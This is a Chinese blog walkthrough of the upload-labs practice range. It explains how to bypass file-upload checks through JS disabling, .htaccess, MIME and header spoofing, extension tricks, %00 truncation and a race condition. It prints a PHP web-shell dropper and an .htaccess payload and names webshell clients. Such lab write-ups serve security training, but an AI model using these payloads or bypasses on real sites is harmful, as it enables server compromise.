文件上传【2】--靶场通关

本文详细描述了前端和后端文件上传过程中遇到的各种绕过机制,如JS验证、htaccess、MIME类型、文件头、黑名单过滤漏洞、字符编码等,以及如何利用这些漏洞进行攻击和防御措施。作者还提及了条件竞争、二次渲染绕过和特定文件路径过滤的绕过方法。
摘要由CSDN通过智能技术生成

1.前端禁用js绕过

上传文件,进行抓包,没有抓到,说明这里的验证是前端js验证跳出的弹窗


禁用js后,php文件上传成功。


2.文件上传.htaccess

上传png木马后连接不上

代码中存在.htaccess,判断此时应该就是需要用到.htaccess绕过了

编写.htaccess文件  后缀就改为.htaccess,下列为.htaccess文件内容:
AddType application/x-httpd-php .png

放行之后连接木马,显示成功。

3.MIME绕过

上传2.php文件显示文件类型不正确,抓包更改文件类型为image/png,放行即可

文件类型更改后放行,文件上传成功,木马连接成功。

4.文件头绕过

上传php文件并抓包,修改类型和在上传的文件前加上文件头GIF89a

上传成功进行连接

5.黑名单过滤不严--双写绕过

上传php文件后,打开图片地址发现后面的php后缀名被删除了

抓包双写后缀名php,看是否只过滤一次

后缀名更改为pphphp后,发现上传成功

使用工具进行连接

6.黑名单过滤不严--大小写绕过

抓包修改后缀名更改为大写PHP

发现更改重新上传后,显示上传成功,回显如下

7.文件上传--GET 型%00截断绕过

文件上传--00截断前提条件

抓包修改后缀、MIME类型和在上传路径添加new.php,使用%00截断

发送后,使用HackBar验证是否成功

上传成功之后使用哥斯拉进行连接

8.文件上传--POST型%00截断绕过

抓包修改上传文件后缀名、MIME类型和添加new.php文件并使用%00进行截断

截断时选中%00,使用URL解码后(不使用解码,上传失败),进行放行

显示上传成功,进行命令执行

9.黑名单过滤不严--php3绕过

抓包修改php为PHP3

修改后放行显示上传成功,并连接成功


10.条件竞争

制作一个1.php文件,内容是:
<?php fputs(fopen('xiao.php','w'),'<?php eval($_REQUEST[1]);?>');?>

上传1.php文件进行抓包,添加参数?a=1,进行10000次上传爆破


访问上传的php文件,进行抓包,添加参数?a=1,进行10000次访问爆破

两边同时显示上传成功

访问上传文件,显示成功

成功后可以通过HarkBar进行命令执行

亦可以通过哥斯拉或蚁剑进行连接

11.二次渲染绕过

生成一个图片马为2.gif

 

12.黑名单 move_uploaded_file /.绕过

上传2.php文件,并保存为2.php/. 抓包进行放行

上传成功,查看上传文件回显

使用哥斯拉进行连接

  • 17
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
要成功通关upload-labs靶场,你需要按照关卡的顺序逐一完成各个关卡。该靶场提供了各种文件上传漏洞类型的练习,从易到难,旨在帮助新手巩固练习。 在上传文件的过程中,关键点是要找到目标文件存储的路径,并将临时存储路径的文件移动到目标路径。根据引用中的代码片段,可以看出在成功移动文件后,即可通关。 具体来说,通过挑战中提供的信息,例如引用中的文件路径,可以尝试在上传时修改文件的路径,使其符合要求。根据引用中的代码,移动文件的函数是move_uploaded_file,这意味着只有当文件成功移动到指定路径时,才会通关。 因此,通关upload-labs靶场的关键是了解文件上传漏洞的原理、找到目标文件的存储路径,并通过修改文件路径、上传恶意文件等方式,成功移动文件到指定路径。通过逐一完成各个关卡,你将能够巩固你的文件上传漏洞知识并提升你的技能水平。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [WEB渗透学习-upload-labs靶场](https://download.csdn.net/download/weixin_41571993/85188837)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [文件上传漏洞upload-labs靶场通关教程 1-20(带原理)](https://blog.csdn.net/m0_72755466/article/details/128499580)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值